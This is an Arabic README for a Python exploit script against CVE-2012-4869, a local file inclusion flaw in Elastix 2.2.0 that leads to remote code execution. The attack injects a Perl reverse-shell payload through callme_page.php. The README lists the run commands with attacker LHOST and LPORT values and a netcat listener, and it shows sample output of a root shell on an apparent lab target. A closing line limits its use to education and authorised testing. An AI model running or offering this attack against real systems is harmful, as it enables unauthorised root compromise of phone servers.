
سكريبت استغلال بلغة بايثون لثغرة الـ LFI في Elastix 2.2.0 (CVE-2012-4869) تمكن من تنفيذ كود عن بعد عبر حقن حمولة شِل عكسي بلغة Perl.
يستغل هذا السكريبت ثغرة تضمين الملفات المحلية (LFI) في Elastix 2.2.0، مما يسمح بتنفيذ الأوامر عن بُعد (RCE) عن طريق حقن الأوامر عبر نقطة النهاية callme_page.php. يعتمد الإكسسوار على CVE-2012-4869.
requestsقم بتثبيت التبعيات باستخدام:
pip install requests
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
قبل تشغيل الإكسسوار، ابدأ مستمع Netcat على جهازك:
nc -lvnp 9001
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001
[+] Exploit sent successfully, waiting for reverse shell...
[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
هذا الإكسسوار مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط. الاستخدام غير المصرح به غير قانوني. المؤلف غير مسؤول عن إساءة استخدام هذه الأداة.